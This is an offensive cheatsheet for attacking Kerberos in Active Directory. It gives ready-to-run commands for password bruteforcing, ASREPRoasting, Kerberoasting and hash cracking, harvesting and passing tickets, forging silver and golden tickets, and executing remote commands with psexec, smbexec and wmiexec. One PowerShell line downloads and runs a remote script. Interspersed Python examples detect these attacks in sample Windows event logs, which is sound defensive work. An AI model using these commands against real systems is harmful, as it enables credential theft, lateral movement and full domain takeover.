Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

  1. python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With a Rubeus build that includes the brute module:

  1. # with a list of users
  2. .\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
  3. # check passwords for all users in current domain
  4. .\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

ASREPRoast

With Impacket example GetNPUsers.py:

  1. # check ASREPRoast for all domain users (credentials required)
  2. python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
  3. # check ASREPRoast for a list of users (no credentials required)
  4. python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

With Rubeus:

  1. # check ASREPRoast for all users in current domain
  2. .\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

Cracking with dictionary of passwords:

  1. hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
  2. john --wordlist=<passwords_file> <AS_REP_responses_file>

Kerberoasting

With Impacket example GetUserSPNs.py:

  1. python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

With Rubeus:

  1. .\Rubeus.exe kerberoast /outfile:<output_TGSs_file>

With PowerShell:

  1. iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
  2. Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

Cracking with dictionary of passwords:

  1. hashcat -m 13100 --force <TGSs_file> <passwords_file>
  2. john --format=krb5tgs --wordlist=<passwords_file> <TGSs_file>
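Both ASREPRoast and Kerberoasting leave traces on the domain controllers: an AS-REP without pre-authentication is logged as event 4768 with PreAuthType 0, and the ticket requests above are logged as event 4769, usually with RC4 (etype 0x17) because that is the form the cracking modes above consume. The following added example (not part of this cheatsheet or of Impacket/Rubeus) runs those two checks over constructed sample events; the one-line key=value layout, the thresholds and the host/IP values are assumptions for the example.

```python
from collections import defaultdict

# Constructed sample events, not real log data. Field names follow the Windows
# Security log (4768 = TGT requested, 4769 = service ticket requested); the
# one-line "key=value" layout is an assumption made for this example.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=alice ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 IpAddress=10.0.0.5",
    "EventID=4768 TargetUserName=svc_legacy ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=0 IpAddress=10.0.0.99",
    "EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=FS01$ TicketEncryptionType=0x12 IpAddress=10.0.0.5",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.99",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.99",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.0.0.99",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=FS01$ TicketEncryptionType=0x17 IpAddress=10.0.0.99",
]

RC4_HMAC = 0x17  # etype 23, the type the hashcat modes 18200/13100 above consume

def parse_event(line):
    return dict(field.split("=", 1) for field in line.split())

def is_asreproast_candidate(ev):
    # PreAuthType 0 in a 4768 means the KDC answered without pre-authentication,
    # which is exactly the AS-REP that GetNPUsers / Rubeus asreproast collect.
    return ev.get("EventID") == "4768" and ev.get("PreAuthType") == "0"

def is_rc4_service_ticket(ev):
    # Machine accounts (trailing $) have long random passwords and are not
    # crackable in practice, so they only add noise to the count.
    return (ev.get("EventID") == "4769"
            and int(ev.get("TicketEncryptionType", "0"), 16) == RC4_HMAC
            and not ev.get("ServiceName", "").endswith("$"))

def find_kerberoast_requesters(events, min_accounts=3):
    # Kerberoasting shows up as one principal pulling RC4 tickets for many
    # different service accounts. Tune min_accounts and add a time window in
    # production; RC4 on its own is noisy in domains with legacy systems.
    seen = defaultdict(set)
    for ev in events:
        if is_rc4_service_ticket(ev):
            seen[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_accounts}

def analyse(lines):
    events = [parse_event(line) for line in lines]
    return {
        "asreproast": [ev["TargetUserName"] for ev in events if is_asreproast_candidate(ev)],
        "kerberoast": find_kerberoast_requesters(events),
    }

if __name__ == "__main__":
    print(analyse(SAMPLE_EVENTS))
```

On the sample data svc_legacy is reported as ASREPRoastable (its account has pre-authentication disabled) and bob from 10.0.0.99 is reported for requesting RC4 tickets for three distinct service accounts; the machine account ticket is ignored.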

Overpass The Hash/Pass The Key (PTK)

By using Impacket examples:

  1. # Request the TGT with hash
  2. python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
  3. # Request the TGT with the AES key (stronger encryption and probably stealthier, since AES is what Microsoft uses by default)
  4. python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
  5. # Request the TGT with password
  6. python getTGT.py <domain_name>/<user_name>:[password]
  7. # If the password is omitted, it is prompted for
  8. # Set the TGT for impacket use
  9. export KRB5CCNAME=<TGT_ccache_file>
  10. # Execute remote commands with any of the following by using the TGT
  11. python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  12. python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  13. python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

With Rubeus and PsExec:

  1. # Ask and inject the ticket
  2. .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
  3. # Execute a cmd in the remote machine
  4. .\PsExec.exe -accepteula \\<remote_hostname> cmd

Pass The Ticket (PTT)

Harvest tickets from Linux

Check type and location of tickets:

  1. grep default_ccache_name /etc/krb5.conf

If nothing is returned, the default is FILE:/tmp/krb5cc_%{uid}.

If the tickets are FILE-based, you can copy them (given sufficient permissions) and use them.

If the tickets are KEYRING-based, you can use tickey to extract them:

  1. # To dump the current user's tickets; if root, try to dump all of them by injecting into other users' processes
  2. # To inject, copy tickey to a folder reachable by all users
  3. cp tickey /tmp/tickey
  4. /tmp/tickey -i
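The grep above only works when the setting is present; krb5 falls back to the FILE default otherwise, and a name without a TYPE: prefix is also treated as a FILE cache. The following added example (not from this cheatsheet or from MIT krb5) resolves where a user's credential cache lives and of which type it is, so that an administrator can audit the permissions on /tmp caches or confirm that a host keeps them in the kernel keyring. The configuration text is constructed for the example.

```python
import re

# Constructed sample configuration, not taken from any real host.
SAMPLE_KRB5_CONF = """\
[libdefaults]
    default_realm = CORP.LOCAL
    # caches go to the kernel keyring on this host
    default_ccache_name = KEYRING:persistent:%{uid}

[realms]
    CORP.LOCAL = {
        kdc = dc01.corp.local
    }
"""

DEFAULT_CCACHE = "FILE:/tmp/krb5cc_%{uid}"  # the default given in the text above

def libdefault(conf_text, key):
    """Return the value of `key` from the [libdefaults] section, or None."""
    section = None
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # '#' starts a comment in krb5.conf
        if not line:
            continue
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            section = header.group(1)
            continue
        if section == "libdefaults" and "=" in line:
            k, v = (part.strip() for part in line.split("=", 1))
            if k == key:
                return v
    return None

def ccache_location(conf_text, uid):
    """Return (cache type, residual) for the given uid after expanding %{uid}."""
    name = libdefault(conf_text, "default_ccache_name") or DEFAULT_CCACHE
    name = name.replace("%{uid}", str(uid))
    if ":" not in name:
        return "FILE", name  # krb5 treats a bare path as a FILE cache
    ctype, _, residual = name.partition(":")
    return ctype.upper(), residual

if __name__ == "__main__":
    print(ccache_location(SAMPLE_KRB5_CONF, 1000))
```

A FILE cache is an ordinary file whose protection is just its mode bits, while KEYRING and KCM caches are not reachable by copying a file; that distinction is why the section above branches on the cache type.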

Harvest tickets from Windows

With Mimikatz:

  1. mimikatz # sekurlsa::tickets /export

With Rubeus in PowerShell:

  1. .\Rubeus.exe dump
  2. # Rubeus dumps tickets as base64; to write one to a file:
  3. [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))

To convert tickets between Linux/Windows format with ticket_converter.py:

  1. python ticket_converter.py ticket.kirbi ticket.ccache
  2. python ticket_converter.py ticket.ccache ticket.kirbi

Using ticket in Linux:

With Impacket examples:

  1. # Set the ticket for impacket use
  2. export KRB5CCNAME=<TGT_ccache_file_path>
  3. # Execute remote commands with any of the following by using the TGT
  4. python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  5. python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  6. python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using ticket in Windows

Inject ticket with Mimikatz:

  1. mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject ticket with Rubeus:

  1. .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute a cmd in the remote machine with PsExec:

  1. .\PsExec.exe -accepteula \\<remote_hostname> cmd

Silver ticket

With Impacket examples:

  1. # To generate the TGS with NTLM
  2. python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
  3. # To generate the TGS with AES key
  4. python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
  5. # Set the ticket for impacket use
  6. export KRB5CCNAME=<TGS_ccache_file>
  7. # Execute remote commands with any of the following by using the TGS
  8. python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  9. python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  10. python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

With Mimikatz:

  1. # To generate the TGS with NTLM
  2. mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
  3. # To generate the TGS with the service account's AES 128 key
  4. mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<service_account_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
  5. # To generate the TGS with the service account's AES 256 key (stronger encryption and probably stealthier, since AES is what Microsoft uses by default)
  6. mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<service_account_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
  7. # Inject TGS with Mimikatz
  8. mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject ticket with Rubeus:

  1. .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute a cmd in the remote machine with PsExec:

  1. .\PsExec.exe -accepteula \\<remote_hostname> cmd

Golden ticket

With Impacket examples:

  1. # To generate the TGT with NTLM
  2. python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
  3. # To generate the TGT with AES key
  4. python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
  5. # Set the ticket for impacket use
  6. export KRB5CCNAME=<TGT_ccache_file>
  7. # Execute remote commands with any of the following by using the TGT
  8. python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  9. python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  10. python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

With Mimikatz:

  1. # To generate the TGT with NTLM
  2. mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
  3. # To generate the TGT with AES 128 key
  4. mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
  5. # To generate the TGT with AES 256 key (stronger encryption and probably stealthier, since AES is what Microsoft uses by default)
  6. mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
  7. # Inject TGT with Mimikatz
  8. mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject ticket with Rubeus:

  1. .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute a cmd in the remote machine with PsExec:

  1. .\PsExec.exe -accepteula \\<remote_hostname> cmd
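A golden ticket is forged offline, so the TGT it represents was never issued by a domain controller: the account then produces service ticket requests (event 4769) with no preceding TGT request (event 4768) or renewal (event 4770). The following added example (not part of this cheatsheet or of Mimikatz/Impacket) correlates the two over constructed sample events; the event shape, the accounts and addresses, and the 10 hour window (the default maximum user ticket lifetime) are assumptions for the example. It only works on logs collected from every domain controller, since the legitimate 4768 may have been logged on a different DC.

```python
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)  # default "Maximum lifetime for user ticket"

# Constructed sample events, not real log data. 4768 = TGT issued by a DC,
# 4770 = ticket renewed, 4769 = service ticket requested with a TGT.
SAMPLE_EVENTS = [
    {"time": "2024-01-10T08:00:00", "id": 4768, "user": "alice", "ip": "10.0.0.5"},
    {"time": "2024-01-10T08:05:00", "id": 4769, "user": "alice@CORP.LOCAL", "ip": "10.0.0.5", "service": "FS01$"},
    {"time": "2024-01-10T09:30:00", "id": 4769, "user": "Administrator@CORP.LOCAL", "ip": "10.0.0.99", "service": "DC01$"},
    {"time": "2024-01-10T22:00:00", "id": 4769, "user": "alice@CORP.LOCAL", "ip": "10.0.0.5", "service": "WEB01$"},
]

def account_of(principal):
    # 4769 logs "user@REALM"; 4768 logs the bare account name.
    return principal.split("@", 1)[0].lower()

def find_tgs_without_tgt(events, lifetime=TGT_LIFETIME):
    """Return the 4769 events whose account has no 4768/4770 within `lifetime` before them."""
    last_tgt = {}
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        account = account_of(ev["user"])
        if ev["id"] in (4768, 4770):
            last_tgt[account] = ts
        elif ev["id"] == 4769:
            issued = last_tgt.get(account)
            if issued is None or ts - issued > lifetime:
                alerts.append(ev)
    return alerts

if __name__ == "__main__":
    for ev in find_tgs_without_tgt(SAMPLE_EVENTS):
        print("service ticket without a known TGT:", ev)
```

On the sample data the Administrator request at 09:30 is flagged because no TGT was ever issued to that account, and alice's request at 22:00 is flagged because her only TGT is 14 hours old and no renewal was logged; her 08:05 request is within the window and passes.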

Misc

To get NTLM from password:

  1. python3 -c 'import hashlib; print(hashlib.new("md4", "<password>".encode("utf-16le")).hexdigest())'
  2. # On Python builds linked against OpenSSL 3, "md4" raises ValueError unless the legacy provider is enabled

Tools